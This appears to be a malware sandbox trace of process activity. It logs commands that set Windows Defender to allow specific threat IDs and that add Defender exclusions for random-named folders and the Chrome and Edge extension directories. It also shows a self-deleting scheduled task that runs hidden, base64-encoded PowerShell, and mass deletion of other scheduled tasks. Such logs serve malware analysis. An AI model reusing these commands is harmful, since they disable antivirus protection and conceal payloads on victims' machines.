"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:4888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EkAcBLsehYBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EkAcBLsehYBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LjPBjCkxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LjPBjCkxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WEPOREuymMJJC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WEPOREuymMJJC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yyjtaGBLEqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yyjtaGBLEqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PtxASTBQXXYOENVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PtxASTBQXXYOENVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dkHlCbgnIThowMMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dkHlCbgnIThowMMU\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:400

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PtxASTBQXXYOENVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PtxASTBQXXYOENVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ /t REG_DWORD /d 0 /reg:32
3⤵
PID:4784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ /t REG_DWORD /d 0 /reg:64
3⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dkHlCbgnIThowMMU /t REG_DWORD /d 0 /reg:32
3⤵
PID:3344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dkHlCbgnIThowMMU /t REG_DWORD /d 0 /reg:64
3⤵
PID:3300

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXqmKbDRR" /SC once /ST 04:10:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:5028

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXqmKbDRR"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXqmKbDRR"
2⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iYllYzWOsJAFFfwAw"
2⤵
PID:3772

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw"
2⤵
PID:60

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iYllYzWOsJAFFfwAw2"
2⤵
PID:540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw2"
2⤵
PID:4952

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fPtQZVBGyPdaKQTOv"
2⤵
PID:2024

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv"
2⤵
PID:3216

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fPtQZVBGyPdaKQTOv2"
2⤵
PID:3268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv2"
2⤵
PID:3932

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BCnLzkyOLZmLmIzwE"
2⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE"
2⤵
PID:5048

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BCnLzkyOLZmLmIzwE2"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE2"
2⤵
PID:220

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "KuLOMfOQwGIIxjPQo"
2⤵
PID:2492

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo"
2⤵
PID:212

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "KuLOMfOQwGIIxjPQo2"
2⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo2"
2⤵
PID:4132

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QpHLEFsCJKnqdWiFQ"
2⤵
PID:4468

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ"
2⤵
PID:2288

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QpHLEFsCJKnqdWiFQ2"
2⤵
PID:3352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ2"
2⤵
PID:3424

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JjLlOQoXGuQPCUatX"
2⤵
PID:2880

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX"
2⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JjLlOQoXGuQPCUatX2"
2⤵
PID:2032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX2"
2⤵
PID:1900

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ahBPwJtarfivgyQCX"
2⤵
PID:5092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ahBPwJtarfivgyQCX"
2⤵
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ahBPwJtarfivgyQCX2"
2⤵
PID:3120

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ahBPwJtarfivgyQCX2"
2⤵
PID:3956

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dSEsiSMbbyMjmgUXi"
2⤵
PID:4784

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi"
2⤵
PID:2756

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dSEsiSMbbyMjmgUXi2"
2⤵
PID:3136

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi2"
2⤵
PID:4024

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lxqfHZMYglidBLlwk"
2⤵
PID:3932

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lxqfHZMYglidBLlwk"
2⤵
PID:2312

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lxqfHZMYglidBLlwk2"
2⤵
PID:2748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lxqfHZMYglidBLlwk2"
2⤵
PID:2448

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "GgtgzPiQnzQTXdKHD"
2⤵
PID:956

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD"
2⤵
PID:212

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "GgtgzPiQnzQTXdKHD2"
2⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD2"
2⤵
PID:2000

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hSKXczqQgUSiKyBIq"
2⤵
PID:5044

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq"
2⤵
PID:3888

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hSKXczqQgUSiKyBIq2"
2⤵
PID:4184

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq2"
2⤵
PID:764

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "USQKnjDrryqfkhdiY"
2⤵
PID:1440

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "USQKnjDrryqfkhdiY"
2⤵
PID:1756

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "USQKnjDrryqfkhdiY2"
2⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "USQKnjDrryqfkhdiY2"
2⤵
PID:3772

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yUsQetiTYqwFtrFXE"
2⤵
PID:2356

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE"
2⤵
PID:1404

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yUsQetiTYqwFtrFXE2"
2⤵
PID:2684

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE2"
2⤵
PID:4784

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oNisdINIjIDgGJWJp"
2⤵
PID:2444

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oNisdINIjIDgGJWJp"
2⤵
PID:1948

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oNisdINIjIDgGJWJp2"
2⤵
PID:1708

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oNisdINIjIDgGJWJp2"
2⤵
PID:4820

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FflikJmsVSrpAnzdm"
2⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FflikJmsVSrpAnzdm"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FflikJmsVSrpAnzdm2"
2⤵
PID:1300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FflikJmsVSrpAnzdm2"
2⤵
PID:1436

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bhrRzeLjFMONelYUe"
2⤵
PID:4580

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bhrRzeLjFMONelYUe"
2⤵
PID:4280

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bhrRzeLjFMONelYUe2"
2⤵
PID:3992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bhrRzeLjFMONelYUe2"
2⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zFCxEKyYfHZqHRxXg"
2⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg"
2⤵
PID:3292

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zFCxEKyYfHZqHRxXg2"
2⤵
PID:4992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg2"
2⤵
PID:4220

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tRrjoTQcDsRkclAsy"
2⤵
PID:5104

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy"
2⤵
PID:1056

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tRrjoTQcDsRkclAsy2"
2⤵
PID:4440

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy2"
2⤵
PID:1156

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zoWzbtLxqmMmTAlSq"
2⤵
PID:2356

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq"
2⤵
PID:4040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zoWzbtLxqmMmTAlSq2"
2⤵
PID:5040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq2"
2⤵
PID:1372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DRTidHIeKPheRAMyM"
2⤵
PID:3268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DRTidHIeKPheRAMyM"
2⤵
PID:696

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DRTidHIeKPheRAMyM2"
2⤵
PID:5028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DRTidHIeKPheRAMyM2"
2⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FbVloGRvRXpHpvUoC"
2⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC"
2⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FbVloGRvRXpHpvUoC2"
2⤵
PID:220

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC2"
2⤵
PID:3248

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DmubMkhxcDoElzROBpi"
2⤵
PID:3104

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi"
2⤵
PID:3368

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DmubMkhxcDoElzROBpi2"
2⤵
PID:5036

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi2"
2⤵
PID:5096

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "gTSPEAyXWRBkgECtlmW"
2⤵
PID:1616

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW"
2⤵
PID:2880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "gTSPEAyXWRBkgECtlmW2"
2⤵
PID:4500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW2"
2⤵
PID:840

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DgPohQYoFstDEAukEvE"
2⤵
PID:2360

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE"
2⤵
PID:4988

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DgPohQYoFstDEAukEvE2"
2⤵
PID:4680

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE2"
2⤵
PID:2488

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pUflfRSniGOrkEioyUk"
2⤵
PID:1976

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk"
2⤵
PID:1216

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pUflfRSniGOrkEioyUk2"
2⤵
PID:2440

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk2"
2⤵
PID:1396

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "myNYhcWULdyyuqVeOLR"
2⤵
PID:1544

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR"
2⤵
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "myNYhcWULdyyuqVeOLR2"
2⤵
PID:3808

